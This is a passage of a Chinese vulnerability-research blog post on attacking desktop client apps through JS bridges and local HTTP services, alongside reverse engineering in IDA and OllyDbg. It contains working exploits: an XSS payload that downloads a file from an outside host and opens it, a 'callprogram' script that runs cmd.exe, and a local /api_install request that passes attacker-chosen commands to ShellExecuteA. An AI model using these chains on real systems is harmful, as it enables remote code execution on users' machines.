      \u8ddf\u8fdb\u4ee3\u7801\u548c\u6d4b\u8bd5\u4e4b\u540e\uff0c\u53d1\u73b0\u5b83\u5c31\u662f\u6587\u4ef6\u6253\u5f00\u51fd\u6570\uff0c\u5728Console\u4e0b\u53bb\u8c03\u7528\uff0c\u6210\u529f\u6253\u5f00\u8ba1\u7b97\u5668\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u63a5\u7740\u770b\u5bfc\u51fa\u51fd\u6570\u5217\u8868\u7684\u5176\u4ed6\u9879\uff0c\u53d1\u73b0\u5b58\u5728\u4e24\u4e2a\u6587\u4ef6\u4fdd\u5b58\u7684\u65b9\u6cd5\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u800c\u5b83\u4eec\u6240\u6307\u5411\u7684\u90fd\u662f\u53e6\u5916\u4e00\u4e2a\u6a21\u5757\u7684\u65b9\u6cd5\uff1a<\/p>\n\n
      const Download = require('..\/download_extra\/download.render.js');\n<\/code><\/pre>\n\n
      \u8ddf\u8fdb\u8fd9\u4e2a\u6a21\u5757\uff0c\u53d1\u73b0\u5b9e\u9645\u4e0a\u4ed6\u4eec\u90fd\u6765\u81ea\u540c\u4e00\u4e2a\u65b9\u6cd5\uff0c\u53ea\u4e0d\u8fc7\u4f20\u9012\u7684\u53c2\u6570isSelect\u6709\u4e0d\u540c\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u63a5\u7740\u6211\u4eec\u6765\u5b8c\u6574\u7684\u9605\u8bfb\u4e0b\u4ee3\u7801\u5373\u53ef\u53d1\u73b0\u6574\u4e2a\u903b\u8f91\uff0c\u9996\u5148\u6839\u636e\u4f60\u4f20\u9012\u7684\u53c2\u6570\u6765\u5224\u65ad\u8981\u8c03\u7528NormalDownload\uff08\u6b63\u5e38\u4e0b\u8f7d\uff09\u8fd8\u662fChunkDownload\uff08\u5206\u5757\u4e0b\u8f7d\uff09\uff0c\u63a5\u7740\u6839\u636eisSelect\u51fd\u6570\u6765\u5224\u65ad\u8c03\u7528save\u8fd8\u662fsaveAs\u65b9\u6cd5\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u6240\u4ee5\u6211\u4eec\u4ecd\u7136\u9700\u8981\u8ddf\u8fdbNormalDownload\u6216ChunkDownload\u5bf9\u5e94\u7684\u4ee3\u7801\uff0c\u6765\u67e5\u770b\u5b83\u4eec\u8fd9\u4e9b\u65b9\u6cd5\u7684\u903b\u8f91\u662f\u4ec0\u4e48\uff0c\u8fd9\u91cc\u770b\u4e86\u4e4b\u540e\uff0c\u4e24\u8005\u4ee3\u7801\u7684\u552f\u4e00\u533a\u522b\u5c31\u662f\u5206\u5757\uff0c\u6240\u4ee5\u672c\u6587\u5c31\u4ee5NormalDownload\u7684save\u3001saveAs\u65b9\u6cd5\u53bb\u8bf4\u660e\u3002<\/p>\n\n
      \u9996\u5148\u662fsaveAs\u65b9\u6cd5\uff0c\u5b83\u4f1a\u8c03\u7528\u4e00\u4e2a\u6587\u4ef6\u4fdd\u5b58\u6846\uff0c\u7136\u540e\u8d4b\u503c\u8c03\u7528retryStart\u65b9\u6cd5\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u800c\u5b9e\u9645\u4e0aretryStart\u65b9\u6cd5\u5185\u8c03\u7528\u7684\u662fstart\u65b9\u6cd5\uff0c\u8fd9\u4e2a\u65b9\u6cd5\u662f\u7528\u6765\u8fdb\u884c\u8bf7\u6c42\u4e0b\u8f7d\u7684\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u800c\u540e\u4e0b\u8f7d\u7684\u6587\u4ef6\u5b9e\u9645\u4e0a\u4f1a\u4fdd\u5b58\u5728\u7528\u6237\u7684\u6570\u636e\u76ee\u5f55\u4e0b\uff0csave\u65b9\u6cd5\u4e0esaveAs\u65b9\u6cd5\u7684\u6700\u5927\u7684\u4e0d\u540c\u5c31\u662f\u6ca1\u6709\u8fd9\u4e2a\u6587\u4ef6\u4fdd\u5b58\u6846\uff0c\u6240\u4ee5\u6211\u4eec\u5f53\u7136\u9009\u62e9\u4f7f\u7528save\u65b9\u6cd5\u3002<\/p>\n\n
      \u9700\u8981\u6ce8\u610f\uff0c\u5728\u5982\u4e0a\u4ee3\u7801\u4e2dsave\u548csaveAs\u7684\u4f20\u9012\u53c2\u6570\u4e0d\u4e00\u81f4\uff0c\u5176\u5b9e\u8fd9\u4e0d\u5f71\u54cd\u6700\u7ec8\u7684\u5904\u7406\uff0c\u56e0\u4e3a\u5728\u4e00\u5f00\u59cb\u7684\u5bf9\u8c61\u521b\u5efa\u65f6\u5019\u5c31\u901a\u8fc7\u6784\u9020\u51fd\u6570\u8d4b\u503c\u4e86\uff1a<\/p>\n\n
      let downloader = new Download(file, config);\n<\/code><\/pre>\n\n
      \"\"<\/p>\n\n
      \u81f3\u6b64\uff0c\u6211\u4eec\u5c31\u83b7\u5f97\u4e86\u6587\u4ef6\u4e0b\u8f7d\u7684\u653b\u51fb\u8def\u5f84\uff0c\u6211\u4eec\u53ef\u4ee5\u6839\u636e\u5bf9\u5e94\u53c2\u6570\u8fd9\u6837\u6784\u5efaJS\u4ee3\u7801\uff1a<\/p>\n\n
      ZxDesktop.require(\"File\").save({\"url\": \"http:\/\/gh0st.cn:81\/test.txt\",\"name\": \"test.txt\",\"path\": \"\",\"chunkSize\": \"\",\"size\": \"\",\"fileData\": \"\"});\n<\/code><\/pre>\n\n
      \u6211\u4eec\u5df2\u7ecf\u83b7\u5f97\u4e86\u6587\u4ef6\u4e0b\u8f7d\u7684\u529f\u80fd\uff0c\u653b\u51fb\u8def\u5f84\u5c31\u5f88\u660e\u663e\u4e86\uff1a\u7528\u6237\u4e0b\u8f7d\u6587\u4ef6\uff0c\u6253\u5f00\u6587\u4ef6\u3002\u4f46\u662f\u5b9e\u9645\u64cd\u4f5c\u4e2d\uff0c\u6211\u4eec\u6253\u5f00\u6587\u4ef6\u8fd8\u7f3a\u5c11\u4e00\u4e2a\u8def\u5f84\uff0c\u5e76\u4e14\u5728\u5b9e\u9645\u7684\u6d4b\u8bd5\u4e2d\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u4e0b\u8f7d\u7684\u6587\u4ef6\u662f\u4f1a\u4fdd\u5b58\u5728\u5e94\u7528\u7684\u6570\u636e\u76ee\u5f55\u7684null\u76ee\u5f55\u4e0b\u3002<\/p>\n\n
      \u800c\u8fd9\u4e2a\u76ee\u5f55\u53ef\u80fd\u4f1a\u88ab\u7528\u6237\u66f4\u6539\uff08\u7528\u6237\u540d\u4e5f\u6ca1\u6cd5\u83b7\u53d6\uff09\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u642d\u914d\u4e00\u4e2a\u70b9\u53bb\u83b7\u53d6\u8def\u5f84\uff0c\u5728\u8fd9\u91cc\u627e\u5230\u4e86ZxDesktop\u7684System\u6a21\u5757\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u5b83\u7684\u5bfc\u51fa\u5217\u8868\u4e2d\u6709\u4e24\u4e2a\u5c5e\u6027\uff1adbPath\u3001userDataPath\uff0c\u5b83\u4eec\u7684\u5185\u5bb9\u90fd\u662f\u4e00\u6837\u7684\uff0c\u6307\u5411\u4e86\u7528\u6237\u7684\u6570\u636e\u76ee\u5f55\uff1a<\/p>\n\n
      ZxDesktop.require(\"System\").userDataPath\n<\/code><\/pre>\n\n
      \u6211\u4eec\u53ef\u4ee5\u8fd9\u6837\u62fc\u63a5\uff0c\u5c31\u6709\u4e86\u4e0b\u8f7d\u6587\u4ef6\u7684\u76ee\u5f55\u4fe1\u606f\u4e86\uff1a<\/p>\n\n
      ZxDesktop.require(\"System\").userDataPath + \"\/null\/test.txt\"\n<\/code><\/pre>\n\n
      \u5f53\u6211\u4eec\u6ee1\u8db3\u6240\u6709\u6761\u4ef6\u540e\uff0c\u5c31\u53ef\u4ee5\u6784\u9020\u5b8c\u6574\u7684\u653b\u51fb\u4ee3\u7801\u4e86\uff1a<\/p>\n\n
      1.\u4e0b\u8f7d\u6587\u4ef6\uff1a<\/p>\n\n
      var a = ZxDesktop;\n\nvar b = a.require(\"File\");\n\nb.save({\"url\": \"http:\/\/gh0st.cn:81\/test.txt\",\"name\": \"test.txt\",\"path\": \"\",\"chunkSize\": \"\",\"size\": \"\",\"fileData\": \"\"});\n<\/code><\/pre>\n\n
      2.\u62fc\u63a5\u6587\u4ef6\u8def\u5f84\uff0c\u6253\u5f00\u6587\u4ef6\uff1a<\/p>\n\n
      b.open(a.require(\"System\").userDataPath + \"\/null\/test.txt\");\n<\/code><\/pre>\n\n
      3.\u6700\u7ec8Exploit\uff1a<\/p>\n\n
      \"><svg onload='var a = ZxDesktop;var b = a.require(\"File\");b.save({\"url\": \"http:\/\/gh0st.cn:81\/test.txt\",\"name\": \"test.txt\",\"path\": \"\",\"chunkSize\": \"\",\"size\": \"\",\"fileData\": \"\"});b.open(a.require(\"System\").dbPath + \"\/null\/test.txt\");'>\n<\/code><\/pre>\n\n
      \"\"<\/p>\n\n
      \u67d0\u8fd0\u7ef4\u5e73\u53f0\u5ba2\u6237\u7aef<\/h5>\n\n
      \u5728\u67d0\u8fd0\u7ef4\u5e73\u53f0\u5ba2\u6237\u7aef\u4e2d\uff0c\u6211\u4eec\u53d1\u73b0\u53ef\u4ee5\u901a\u8fc7\u4f2a\u534f\u8bae\u94fe\u63a5\uff08xxx:\/\/webview\/?url=http:\/\/xxxx<\/code>\uff09\u6765\u8fbe\u5230\u7aef\u5185\u4efb\u610f\u9875\u9762\u52a0\u8f7d\uff0c\u8fd9\u4e5f\u5c31\u8868\u793a\u6211\u4eec\u53ef\u4ee5\u6267\u884c\u4efb\u610fJS\u4ee3\u7801\u3002<\/p>\n\n
      \u6839\u636e\u52a0\u8f7d\u7684DLL\u6587\u4ef6\u5f97\u77e5\uff0c\u5176\u6240\u4f9d\u8d56\u7684\u524d\u7aef\u9875\u9762\u6e32\u67d3\u662f\u5f00\u6e90\u9879\u76eeWke<\/a>\u3002<\/p>\n\n
      \u5728\u6e90\u4ee3\u7801wke\/jsBind.cpp<\/code>\u4e2d\uff0c\u53d1\u73b0wkeJSBindFunction\u65b9\u6cd5\u63d0\u4f9b\u4e86JSBridge\u7684\u529f\u80fd\uff0c\u5c06JavaScript\u51fd\u6570\u7ed1\u5b9a\u5230C++\u4e2d\u4e00\u4e2a\u672c\u5730\u51fd\u6570\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u57fa\u4e8eIDA\u5206\u6790\u5f97\u77e5\uff0c\u76ee\u6807\u5e94\u7528\u4f7f\u7528\u4e86\u8be5\u65b9\u6cd5\u5c06JS\u51fd\u6570\u4e0eC++\u51fd\u6570\u8fdb\u884c\u4e86\u7ed1\u5b9a\u3002\u56fe\u4e0b\u56fe\u6240\u793a\uff0c\u5176\u5c06C++\u67d0\u4e2a\u51fd\u6570\u5730\u5740\uff0c\u4e0e\u540d\u4e3acallprogram\u7684JavaScript\u51fd\u6570\u8fdb\u884c\u7ed1\u5b9a\uff0c\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u5728JS\u4ee3\u7801\u4e2d\u8c03\u7528\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u8ddf\u8fdb\u5bf9\u5e94\u7684C++\u51fd\u6570\uff0c\u6211\u4eec\u53d1\u73b0\u5b83\u4f1a\u901a\u8fc7wkeJSParam\u83b7\u53d6\u53c2\u6570\uff0c\u518d\u901a\u8fc7JSToTempStringW\u83b7\u53d6\u5b57\u7b26\u4e32\u5f62\u5f0f\u7684\u53c2\u6570\u503c\uff0c\u6700\u7ec8\u5c06\u4e24\u4e2a\u53c2\u6570\u5e26\u5165ShellExecuteW\u51fd\u6570\u6267\u884c\u3002\u5373\u6700\u7ec8\u6267\u884c\u7684\u4ee3\u7801\u4e3a\uff1aShellExecuteW(0, \"open\", \u53c2\u65701, \u53c2\u65702, 0, 1)<\/code>\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u6784\u5efa\u5982\u4e0b\u7684Exploit\u4ee3\u7801\uff0c\u5e76\u901a\u8fc7\u4f2a\u534f\u8bae\u7684\u65b9\u5f0f\u4f7f\u76ee\u6807\u53ef\u4ee5\u6253\u5f00\u5305\u542bExp\u4ee3\u7801\u7684\u7f51\u9875\uff1a<\/p>\n\n
      <script>callprogram(\"C:\/Windows\/System32\/cmd.exe\", \"\/c calc\");<\/script>\n<\/code><\/pre>\n\n
      \u4f20\u7edf\u7c7b\u5ba2\u6237\u7aef<\/h4>\n\n
      \u4f20\u7edf\u7c7b\u5ba2\u6237\u7aef\uff0c\u6211\u7684\u5b9a\u4e49\u662f\u57fa\u4e8eC\/C++\u5199\u7684\u4e00\u4e9b\u4f20\u7edf\u5e94\u7528\uff0c\u5982VPN\u5ba2\u6237\u7aef\u3001\u89c6\u9891\u8f6f\u4ef6\u3001\u8fdc\u7a0b\u63a7\u5236\u8f6f\u4ef6\u7b49\u504f\u751f\u6d3b\u3001\u65e5\u5e38\u7c7b\u7684\u5e94\u7528\u3002<\/p>\n\n
      \u67d0\u8fdc\u7a0b\u670d\u52a1\u5e73\u53f0\u5ba2\u6237\u7aef<\/h5>\n\n
      \u5728\u62ff\u5230\u4e00\u4e2a\u5ba2\u6237\u7aef\u7a0b\u5e8f\u65f6\uff0c\u7b2c\u4e00\u6b65\u662f\u5b89\u88c5\uff0c\u7b2c\u4e8c\u6b65\u5219\u5e94\u8be5\u662f\u5148\u5927\u81f4\u53bb\u4e86\u89e3\u8be5\u7a0b\u5e8f\u7684\u4e00\u4e9b\u76ee\u5f55\u7ed3\u6784\u3001\u8fd0\u884c\u73af\u5883\u7b49\u4fe1\u606f\uff0c\u8fd9\u6837\u6211\u4eec\u5728\u63a5\u4e0b\u6765\u7684\u6f0f\u6d1e\u6316\u6398\u4e2d\u624d\u4f1a\u6709\u66f4\u591a\u7684\u4fe1\u606f\u6765\u8fdb\u884c\u5173\u8054\uff0c\u8f85\u52a9\u6211\u4eec\u6316\u6398\u6f0f\u6d1e\u3002<\/p>\n\n
      \u5982\u4e0b\u56fe\u6240\u793a\uff0c\u5b89\u88c5\u5b8c\u67d0\u8fdc\u7a0b\u670d\u52a1\u5e73\u53f0\u5ba2\u6237\u7aef\u540e\uff0c\u6211\u901a\u8fc7\u706b\u7ed2\u5251\u9010\u4e2a\u67e5\u770b\u5bf9\u5e94\u7684\u8fdb\u7a0b\u4fe1\u606f\uff0c\u5728TCP\/IP\u7a97\u53e3\u4e2d\u770b\u89c1\u5f53\u524d\u8fdb\u7a0b\u7684\u7f51\u7edc\u901a\u4fe1\u6216\u76d1\u542c\u4fe1\u606f\u3002\u5982\u4e0b\u56fe\u6240\u793a\u5c31\u662fUserClient.exe<\/code>\u8fdb\u7a0b\u5f53\u524d\u7684\u7f51\u7edc\u901a\u4fe1\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5b83\u5728\u672c\u5730\u76d1\u542c\u4e86\u4e24\u4e2a\u7aef\u53e3\uff1a38227<\/code>\u300138230<\/code>\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u5b83\u7684\u534f\u8bae\u90fd\u662fTCP\uff0c\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u4f7f\u7528HTTP\u7684\u65b9\u5f0f\u53bb\u8bbf\u95ee\uff0c\u7ed3\u679c\u663e\u793a38230<\/code>\u7aef\u53e3\u53ef\u4ee5\u4ee5HTTP\u534f\u8bae\u7684\u65b9\u5f0f\u8fdb\u884c\u8bbf\u95ee\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u6211\u4eec\u53ef\u4ee5\u9009\u53d6\u54cd\u5e94\u62a5\u6587\u4e2d\u7684bangwo8client<\/code>\u5b57\u7b26\u4e32\u5728IDA\u7684Strings\u7a97\u53e3\u4e2d\u8fdb\u884c\u641c\u7d22\uff0c\u901a\u8fc7\u8fd9\u6837\u7684\u65b9\u5f0f\u6765\u8fdb\u884c\u903b\u8f91\u7684\u56de\u6eaf\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u53cc\u51fb\u8fdb\u5165\u5b57\u7b26\u4e32\u6240\u5728\u7684.RDATA<\/code>\u8282\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u770b\u5230\u8be5\u5b57\u7b26\u4e32\u5bf9\u5e94\u7684\u4ea4\u53c9\u5f15\u7528\uff0c\u90a3\u4e48\u63a5\u4e0b\u6765\u6211\u4eec\u7684\u5de5\u4f5c\u5c31\u662f\u8fdb\u5165\u8fd9\u4e9b\u51fd\u6570\u770b\u5177\u4f53\u5b9e\u73b0\u662f\u5426\u5bf9\u7684\u4e0a\u54cd\u5e94\u62a5\u6587\u7684\u4e3b\u4f53\u5185\u5bb9<\/strong>\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u6211\u4eec\u8fdb\u5165\u4e00\u4e2a\u51fd\u6570\u67e5\u770b\uff0c\u4f1a\u53d1\u73b0\u5728\u51fd\u6570\u7684\u5934\u90e8\u4ee3\u7801\u4e2d\u6709\u5982\u4e0b\u8fd9\u4e48\u4e00\u6bb5\u5185\u5bb9\uff0c\u5b83\u7684\u903b\u8f91\u4f3c\u4e4e\u5c31\u5bf9\u5e94\u4e86HTTP\u54cd\u5e94\u62a5\u6587\u7684\u4e3b\u4f53\u8fd4\u56de\uff0c\u901a\u8fc7\u5b57\u7b26\u4e32\u7684\u5bf9\u5e94\u6211\u4eec\u80fd\u5927\u81f4\u77e5\u9053sub_487760<\/code>\u51fd\u6570\u7684\u4f5c\u7528\u5c31\u662f\u4e3a\u4e86\u5c06\u5b57\u7b26\u4e32\u89e3\u6790\u5230JSON\u683c\u5f0f\u4e2d\uff0c\u7136\u540e\u518d\u901a\u8fc7\u5176\u4ed6\u51fd\u6570\u62fc\u63a5JSON\u7684\u5b57\u6bb5\u5185\u5bb9\u7ed9\u5230Block<\/code>\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u9664\u4e86\u6211\u4eec\u8ddf\u8fdb\u7684\u8fd9\u4e2a\u51fd\u6570\u5916\u5176\u4ed6\u7684\u51fd\u6570\u903b\u8f91\u90fd\u5927\u81f4\u4e00\u6837\uff0c\u5e76\u4e14\u6211\u4eec\u901a\u8fc7IDA\u63d2\u4ef6CTO<\/code>\u67e5\u770b\u8c03\u7528\u5173\u7cfb\uff0c\u53d1\u73b0\u8fd9\u4e9b\u51fd\u6570\u6700\u7ec8\u90fd\u662f\u88ab\u540c\u4e00\u4e2a\u51fd\u6570sub_674090<\/code>\u8c03\u7528\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u90a3\u6211\u4eec\u518d\u7ee7\u7eed\u8ddf\u8fdb\u51fd\u6570sub_674090<\/code>\uff0c\u51fd\u6570\u7684\u903b\u8f91\u5c31\u662f\u6839\u636e\u4e0d\u540c\u7684URI\u8fdb\u5165\u4e0d\u540c\u7684\u51fd\u6570\u5904\u7406\uff0c\u4e5f\u5c31\u8868\u793a\u7740\u8fd9\u91cc\u5c31\u662fHTTP\u8bf7\u6c42\u903b\u8f91\u5904\u7406\u7684\u5165\u53e3\u4f4d\u7f6e\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u6709\u4e86\u8bf7\u6c42\u5904\u7406\u903b\u8f91\u7684\u5165\u53e3\uff0c\u63a5\u4e0b\u6765\u6211\u4eec\u5c31\u8981\u53bb\u770b\u6bcf\u4e2aURI\u5bf9\u5e94\u7684\u5904\u7406\u903b\u8f91\u662f\u4ec0\u4e48\uff0c\u770b\u4e00\u4e0b\u5904\u7406\u7684\u903b\u8f91\u4e2d\u662f\u5426\u6709\u53c2\u6570\u503c\u53ef\u63a7\u5bfc\u81f4\u5b58\u5728\u7684\u76f8\u5173\u6f0f\u6d1e\u3002<\/p>\n\n
      \u5982\u679c\u4f60\u89c9\u5f97\u8fd9\u6837\u53bb\u770b\u5f88\u7d2f\uff0c\u4e5f\u53ef\u4ee5\u57fa\u4e8e\u654f\u611f\u51fd\u6570\u7684\u8c03\u7528\u94fe\u6765\u5bf9\u5e94\u6bcf\u4e2aURI\u7684\u5904\u7406\u51fd\u6570\uff0c\u5982\u4e0b\u56fe\u6240\u793a\u6211\u5c31\u57fa\u4e8eShellExecuteA<\/code>\u51fd\u6570\u7684\u8c03\u7528\u94fe\u627e\u5230\u4e86URI\/api_install<\/code>\u7684\u5bf9\u5e94\u5904\u7406\u51fd\u6570\uff0c\u4e5f\u5c31\u8868\u793a\u5f53\u4f60\u8bbf\u95eeURL\uff1ahttp:\/\/127.0.0.1:38230\/api_install<\/code>\u65f6\u5f88\u6709\u53ef\u80fd\u5c31\u4f1a\u89e6\u53d1ShellExecuteA<\/code>\u51fd\u6570\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u8ddf\u8fdb\u53bb\u770b\u4e00\u4e0b\u8be5\u5904\u7406\u51fd\u6570\uff0c\u770b\u770b\u662f\u5426\u53ef\u4ee5\u5c06\u53ef\u63a7\u53c2\u6570\u503c\u5e26\u5165\u5230ShellExecuteA<\/code>\u51fd\u6570\u91cc\u53bb\u6267\u884c\u3002<\/p>\n\n
      \u5728\u51fd\u6570\u7684\u4e00\u5f00\u59cb\u5c31\u5224\u65ad\u8fd0\u884c\u5f53\u524d\u7a0b\u5e8f\u7684\u7528\u6237\u662f\u5426\u662fsystem<\/code>\uff0c\u5982\u679c\u4e0d\u662f\u7684\u8bdd\u5219\u76f4\u63a5\u8fd4\u56de\u54cd\u5e94\u5185\u5bb9\uff08\u72b6\u6001\u7801500\uff09\u63d0\u793a\u5f53\u524d\u4e0d\u662f\u4ee5SYSTEM\u6743\u9650\u8fd0\u884c\u7684\u8fdb\u7a0b\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u8fd9\u91cc\u6211\u4eec\u901a\u8fc7Process Hacker\u53ef\u4ee5\u770b\u5230UserClient.exe<\/code>\u8fdb\u7a0b\u5bf9\u5e94\u7684\u7528\u6237\u5c31\u662fSYSTEM<\/code>\uff1a<\/p>\n\n
      \"\"<\/p>\n\n
      \u4e5f\u5c31\u8868\u793a\u6211\u4eec\u5f53\u524d\u662f\u6ee1\u8db3\u8fd9\u4e2a\u6761\u4ef6\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u63a5\u7740\u770bIF\u5206\u652f\u5185\u7684\u903b\u8f91\u3002\u5728IF\u5206\u652f\u5185\u5c31\u6267\u884c\u4e86ShellExecuteA<\/code>\u51fd\u6570\uff0c\u6839\u636eShellExecuteA<\/code>\u51fd\u6570\u7684\u4f7f\u7528\u8bed\u6cd5\u6211\u4eec\u77e5\u9053\u5b83\u8fd9\u662f\u4ee5v15<\/code>\u4f5c\u4e3a\u53c2\u6570\u6267\u884cv16<\/code>\u7a0b\u5e8f\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u77e5\u9053v15<\/code>\u3001v16<\/code>\u8fd9\u4e24\u4e2a\u53d8\u91cf\u662f\u5982\u4f55\u8d4b\u503c\u800c\u6765\u7684\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u5177\u4f53\u7684\u903b\u8f91\u53ef\u4ee5\u4e0b\u56fe\uff0c\u6211\u4eec\u627e\u5230\u8d4b\u503c\u5173\u7cfb\u6700\u7ec8\u786e\u8ba4\u4e00\u5207\u7684\u53c2\u6570\u6765\u6e90\u90fd\u662fBlock<\/code>\uff0c\u8be5\u503c\u662f\u4e00\u4e2a\u5168\u5c40\u53d8\u91cf\uff0c\u90a3\u4e48\u6839\u636e\u5f53\u524d\u7684\u73af\u5883\u6211\u4eec\u5c31\u53ef\u4ee5\u731c\u6d4b\u6b64\u5904\u7684\u6765\u6e90\u5c31\u662fHTTP\u8bf7\u6c42\u53c2\u6570\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u6839\u636e\u731c\u6d4b\uff0c\u6211\u4eec\u53ef\u4ee5\u5148\u4f7f\u7528OD\u9644\u52a0\u8fdb\u7a0b\u5728ShellExecuteA<\/code>\u51fd\u6570\u5904\u4e0b\u65ad\u70b9\u3002<\/p>\n\n
      \u7136\u540e\u8bf7\u6c42URL\uff1ahttp:\/\/127.0.0.1:38230\/api_install?file=cmd.exe&param=\/k%20notepad<\/code>\uff0c\u6211\u4eec\u5c31\u4f1a\u5728OD\u754c\u9762\u4e2d\u770b\u89c1\u7aef\u70b9\u5230ShellExecuteA<\/code>\u51fd\u6570\u4e86\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u6808\u6765\u770b\u4e00\u4e0b\u4f20\u53c2\u662f\u4ec0\u4e48\u3002<\/p>\n\n
      \u5982\u4e0b\u6240\u793a\u6211\u4eec\u53d1\u73b0ShellExecuteA<\/code>\u51fd\u6570\u7684\u53c2\u6570FileName<\/code>\u548cParameters<\/code>\u662f\u4e00\u4e32\u4e71\u7801\u7684\u5185\u5bb9\uff0c\u8fd9\u5e94\u8be5\u662f\u6211\u4eec\u8f93\u5165\u7684\u5b57\u7b26\u4e32\u7ecf\u8fc7\u4e86\u67d0\u4e9b\u5904\u7406\u540e\u5bfc\u81f4\u7684\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u5728URI\/api_install<\/code>\u5bf9\u5e94\u5904\u7406\u7684\u51fd\u6570\u8d77\u59cb\u4f4d\u7f6e\u4e0b\u65ad\u70b9\u4e00\u6b65\u4e00\u6b65\u8ddf\u8fdb\u770b\u4e00\u4e0b\u6211\u4eec\u8bf7\u6c42\u7684\u53c2\u6570\u503c\u662f\u5426\u771f\u7684\u5e26\u8fdb\u6765\u4e86\uff0c\u5982\u679c\u5e26\u8fdb\u6765\u4e86\u4e3a\u4ec0\u4e48\u6700\u7ec8\u503c\u4f1a\u53d8\u6210\u4e00\u6bb5\u4e71\u7801\u7684\u6570\u636e\u3002<\/p>\n\n
      \u5982\u4e0b\u56feOD\u4e2d\u53ef\u4ee5\u770b\u89c1\u6211\u4eec\u7684\u8bf7\u6c42\u53c2\u6570file<\/code>\u7684\u503ccmd.exe<\/code>\u786e\u5b9e\u53ef\u4ee5\u5e26\u8fdb\u6765\uff0c\u8fd9\u4e5f\u5c31\u9a8c\u8bc1\u4e86\u6211\u4eec\u7684\u731c\u60f3\uff0cShellExecuteA<\/code>\u51fd\u6570\u7684\u53c2\u6570\u662f\u6765\u6e90\u4e8eHTTP\u8bf7\u6c42\u53c2\u6570\u3002<\/p>\n\n
      \"\"<\/p>\n\n
      \u63a5\u7740\u8d70\u4e0b\u53bb\u6211\u4eec\u4f1a\u53d1\u73b0\u8c03\u7528\u5982\u4e0b\u51fd\u6570\u65f6\u7684\u53c2\u6570\u5c31\u662f\u6211\u4eec\u7684\u8bf7\u6c42\u53c2\u6570file<\/code>\u548c\u5bf9\u5e94\u503ccmd.exe<\/code>\uff0c\u5f53\u8be5\u51fd\u6570\u6267\u884c\u5b8c\u6210\u4e4b\u540e\u8fd4\u56de\u5230EAX\u5bc4\u5b58\u5668\uff0c\u6211\u4eec\u8ddf\u8fdbEAX\u5bc4\u5b58\u5668\u7684\u5730\u5740\u67e5\u770b\u6570\u636e\u5c31\u4f1a\u53d1\u73b0\u6570\u636e\u4e3a\u4e71\u7801\u5185\u5bb9\uff0c\u4e5f\u5c31\u662f\u6211\u4eec\u5728ShellExecuteA<\/code>\u51fd\u6570\u65ad\u70b9\u5904\u770b\u89c1\u7684\u53c2\u6570\u3002<\/p>\n\n
      push esi\npush eax\ncall UserClie.004203B0\n<\/code><\/pre>\n\n
      \"\"<\/p>\n\n
      \u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u8ddf\u8fdb\u51fd\u6570004203B0<\/code>\u5728IDA\u4e2d\u770b\u4e00\u4e0b\u5b83\u5177\u4f53\u505a\u4e86\u4ec0\u4e48\uff0c\u8fd9\u6837\u6211\u4eec\u624d\u80fd\u6784\u9020\u8bf7\u6c42\u8ba9\u771f\u6b63\u7684\u5b57\u7b26\u4e32\u5e26\u5165\u5230ShellExecuteA<\/code>\u51fd\u6570\u4e2d\u6267\u884c\u3002<\/p>\n\n
      \u5728\u8fd9\u4e4b\u524d\u6211\u4eec\u9700\u8981\u6ce8\u610f\uff0c\u7531\u4e8eIDA\u548c\u5b9e\u9645\u8fdb\u7a0b\u6267\u884c\u7684\u57fa\u5740\u4e0d\u540c\uff0c\u6211\u4eec\u53ef\u4ee5\u5728OD\u4e2d\u627e\u5230\u8fdb\u7a0b\u57fa\u5740\u7136\u540e\u5c06IDA\u5bf9\u5e94\u7684\u57fa\u5740\u4fee\u6539\u4e3a\u8fdb\u7a0b\u7684\uff0c\u8fd9\u6837\u6211\u4eec\u5c31\u53ef\u4ee5\u76f4\u63a5\u8ddf\u8fdb\u51fd\u6570004203B0<\/code>\uff0c\u800c\u4e0d\u9700\u8981\u518d\u53bb\u8fdb\u884c\u5730\u5740\u7684\u6362\u7b97\u3002<\/p>\n\n
